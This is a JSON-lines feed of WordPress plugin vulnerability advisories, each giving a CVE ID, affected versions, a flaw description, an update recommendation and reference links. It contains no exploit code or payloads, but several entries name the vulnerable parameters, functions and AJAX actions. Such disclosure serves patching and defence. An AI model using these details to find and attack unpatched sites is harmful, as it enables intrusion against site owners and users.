{"CVE_ID":"CVE-2024-13645","slug":"td-composer","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The tagDiv Composer plugin for WordPress is vulnerable to PHP Object Instantiation in all versions up to, and including, 5.3 via module parameter. This makes it possible for unauthenticated attackers to Instantiate a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4124003c-4864-48f1-acba-9a613d9c99ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4124003c-4864-48f1-acba-9a613d9c99ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13527","slug":"philantro","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The Philantro \u2013 Donations and Donor Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'donate' in all versions up to, and including, 5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224699\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224699\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3c8800-cbef-4d85-a1f3-b5c70ba955b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3c8800-cbef-4d85-a1f3-b5c70ba955b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2806","slug":"td-composer","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The tagDiv Composer plugin for WordPress, used by the Newspaper theme, is vulnerable to Reflected Cross-Site Scripting via the \u2018data\u2019 parameter in all versions up to, and including, 5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/td-composer\\\/legacy\\\/common\\\/wp_booster\\\/td_ajax.php#L2034\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/td-composer\\\/legacy\\\/common\\\/wp_booster\\\/td_ajax.php#L2034\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/td_deploy\\\/Newspaper\\\/changed_files_12.6.9_12.7.html\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/td_deploy\\\/Newspaper\\\/changed_files_12.6.9_12.7.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52bd9946-dccc-427a-9abd-0b7153e7484f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52bd9946-dccc-427a-9abd-0b7153e7484f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4534","slug":"wp-limit-failed-login-attempts","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The Limit Login Attempts (Spam Protection) plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 5.3. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/561ec1b2-ee26-4e0c-b437-d70b04be5b4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/561ec1b2-ee26-4e0c-b437-d70b04be5b4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-limit-failed-login-attempts\\\/tags\\\/5.3\\\/login.php#L466\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-limit-failed-login-attempts\\\/tags\\\/5.3\\\/login.php#L466\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3163023\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3163023\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1705","slug":"td-composer","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The tagDiv Composer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.3. This is due to missing or incorrect nonce validation within the td_ajax_get_views AJAX action. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2aaa8c34-cf7b-4630-adc8-cbb534deff89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2aaa8c34-cf7b-4630-adc8-cbb534deff89?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2804","slug":"td-composer","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The tagDiv Composer plugin for WordPress, used by the Newspaper theme, is vulnerable to Reflected Cross-Site Scripting via the 'account_id' and 'account_username' parameters in all versions up to, and including, 5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/td_deploy\\\/Newspaper\\\/changed_files_12.6.9_12.7.html\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/td_deploy\\\/Newspaper\\\/changed_files_12.6.9_12.7.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41ef545a-7de1-406c-8686-57216e697a1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41ef545a-7de1-406c-8686-57216e697a1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1044","slug":"customer-reviews-woocommerce","versionImpact":"5.38.12","versionEndExcluding":"5.39.0","description":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_review' function in all versions up to, and including, 5.38.12. This makes it possible for unauthenticated attackers to submit reviews with arbitrary email addresses regardless of whether reviews are globally enabled.","recommendation":"Update to version 5.39.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4420c334-1ea4-4549-b391-150702abc2f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4420c334-1ea4-4549-b391-150702abc2f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6979","slug":"customer-reviews-woocommerce","versionImpact":"5.38.9","versionEndExcluding":"5.38.10","description":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ivole_import_upload_csv AJAX action in all versions up to, and including, 5.38.9. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.38.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af801db-44a6-4cd3-bd1a-3125490c8c48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af801db-44a6-4cd3-bd1a-3125490c8c48?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/trunk\\\/includes\\\/import-export\\\/class-cr-reviews-importer.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/trunk\\\/includes\\\/import-export\\\/class-cr-reviews-importer.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.proton.me\\\/urls\\\/K4R2HDQBS0#iuTPm3NqZEdz\",\"name\":\"https:\\\/\\\/drive.proton.me\\\/urls\\\/K4R2HDQBS0#iuTPm3NqZEdz\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018507%40customer-reviews-woocommerce&new=3018507%40customer-reviews-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018507%40customer-reviews-woocommerce&new=3018507%40customer-reviews-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3016708%40customer-reviews-woocommerce&new=3016708%40customer-reviews-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3016708%40customer-reviews-woocommerce&new=3016708%40customer-reviews-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0579","slug":"yet-another-related-posts-plugin","versionEndExcluding":"5.30.3","description":"The YARPP WordPress plugin before 5.30.3 does not validate and escape some of its shortcode attributes before using them in SQL statement\/s, which could allow any authenticated users, such as subscribers to perform SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/574f7607-96d8-4ef8-b96c-0425ad7e7690\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/574f7607-96d8-4ef8-b96c-0425ad7e7690\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6495","slug":"yet-another-related-posts-plugin","versionImpact":"5.30.9","versionEndExcluding":"5.30.10","description":"The YARPP \u2013 Yet Another Related Posts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 5.30.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.30.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d586e455-c73f-4916-a926-4d53699bb434?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d586e455-c73f-4916-a926-4d53699bb434?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037032%40yet-another-related-posts-plugin%2Ftrunk&old=2999784%40yet-another-related-posts-plugin%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037032%40yet-another-related-posts-plugin%2Ftrunk&old=2999784%40yet-another-related-posts-plugin%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0602","slug":"yet-another-related-posts-plugin","versionEndExcluding":"5.30.10","description":"The YARPP \u2013 Yet Another Related Posts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.30.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0602\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0602\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037032\\\/yet-another-related-posts-plugin\\\/tags\\\/5.30.10\\\/includes\\\/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin\\\/tags\\\/5.30.9\\\/includes\\\/yarpp_options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037032\\\/yet-another-related-posts-plugin\\\/tags\\\/5.30.10\\\/includes\\\/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin\\\/tags\\\/5.30.9\\\/includes\\\/yarpp_options.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13369","slug":"tourmaster","versionImpact":"5.3.7","versionEndExcluding":"5.3.8","description":"The Tour Master - Tour Booking, Travel, Hotel plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018review_id\u2019 parameter in all versions up to, and including, 5.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/tour-master-tour-booking-travel-wordpress-plugin\\\/20539780\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/tour-master-tour-booking-travel-wordpress-plugin\\\/20539780\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/support.goodlayers.com\\\/document\\\/changelog-tour-master-plugin\\\/\",\"name\":\"https:\\\/\\\/support.goodlayers.com\\\/document\\\/changelog-tour-master-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d7f2cb6-5c19-4126-9f39-439cf6057c5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d7f2cb6-5c19-4126-9f39-439cf6057c5b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8629","slug":"woocommerce-multilingual","versionImpact":"5.3.7","versionEndExcluding":"5.3.8","description":"The WooCommerce Multilingual & Multicurrency with WPML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.3.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494dc869-6f4d-428b-99a8-87212f3007be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494dc869-6f4d-428b-99a8-87212f3007be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multilingual\\\/tags\\\/5.3.7\\\/inc\\\/class-wcml-comments.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multilingual\\\/tags\\\/5.3.7\\\/inc\\\/class-wcml-comments.php#L257\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164233\\\/woocommerce-multilingual\\\/trunk\\\/inc\\\/class-wcml-comments.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164233\\\/woocommerce-multilingual\\\/trunk\\\/inc\\\/class-wcml-comments.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9302","slug":"app-builder","versionImpact":"5.3.7","versionEndExcluding":"5.3.8","description":"The App Builder \u2013 Create Native Android & iOS Apps On The Flight plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.3.7. This is due to the verify_otp_forgot_password() and update_password() functions not having enough controls to prevent a successful brute force attack of the OTP to change a password, or verify that a password reset request came from an authorized user. This makes it possible for unauthenticated attackers to generate and brute force an OTP that makes it possible to change any users passwords, including an administrator.","recommendation":"Update to version 5.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eb9d676-4fa0-4bdc-af44-5d7e1dd8c6e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eb9d676-4fa0-4bdc-af44-5d7e1dd8c6e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/tags\\\/5.3.1\\\/includes\\\/Di\\\/Service\\\/Auth\\\/ForgotPassword.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/tags\\\/5.3.1\\\/includes\\\/Di\\\/Service\\\/Auth\\\/ForgotPassword.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/tags\\\/5.3.1\\\/includes\\\/Di\\\/Service\\\/Auth\\\/ForgotPassword.php#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/tags\\\/5.3.1\\\/includes\\\/Di\\\/Service\\\/Auth\\\/ForgotPassword.php#L196\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161215\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161215\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3715","slug":"bold-page-builder","versionImpact":"5.3.5","versionEndExcluding":"5.3.6","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-text parameter in all versions up to, and including, 5.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.5\\\/content_elements_misc\\\/js\\\/content_elements.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.5\\\/content_elements_misc\\\/js\\\/content_elements.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292512\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292512\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2452dd7-2bb9-4a0c-81db-6699a9b049ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2452dd7-2bb9-4a0c-81db-6699a9b049ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5161","slug":"modal-window","versionImpact":"5.3.5","versionEndExcluding":"5.3.6","description":"The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 5.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/tags\\\/5.3.5\\\/public\\\/shortcode.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/tags\\\/5.3.5\\\/public\\\/shortcode.php#L53\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971132\\\/modal-window#file196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971132\\\/modal-window#file196\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/tags\\\/5.3.5\\\/public\\\/class-public.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/tags\\\/5.3.5\\\/public\\\/class-public.php#L73\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971132\\\/modal-window#file195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2971132\\\/modal-window#file195\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48e2129f-6a2c-45e4-a0cf-7d8d5f563a7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48e2129f-6a2c-45e4-a0cf-7d8d5f563a7f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0453","slug":"chatbot","versionImpact":"5.3.4","versionEndExcluding":"5.3.6","description":"The AI ChatBot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the openai_file_delete_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete files from a linked OpenAI account.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e0ef4a5-42d7-4cea-b19f-51917e3ee55f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e0ef4a5-42d7-4cea-b19f-51917e3ee55f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0452","slug":"chatbot","versionImpact":"5.3.4","versionEndExcluding":"5.3.6","description":"The AI ChatBot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the openai_file_upload_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload files to a linked OpenAI account.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34b6475c-b5dd-42a1-98d1-9b5ae9ff4ad5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34b6475c-b5dd-42a1-98d1-9b5ae9ff4ad5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L208\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L208\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0451","slug":"chatbot","versionImpact":"5.3.4","versionEndExcluding":"5.3.6","description":"The AI ChatBot plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the openai_file_list_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to list files existing in a linked OpenAI account.","recommendation":"Update to version 5.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0572a5-6cc9-43ab-a4a3-c8d3b93c8fcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0572a5-6cc9-43ab-a4a3-c8d3b93c8fcf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089461\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php\",\"refsource\":\"\",\"tags\":[]}]"}
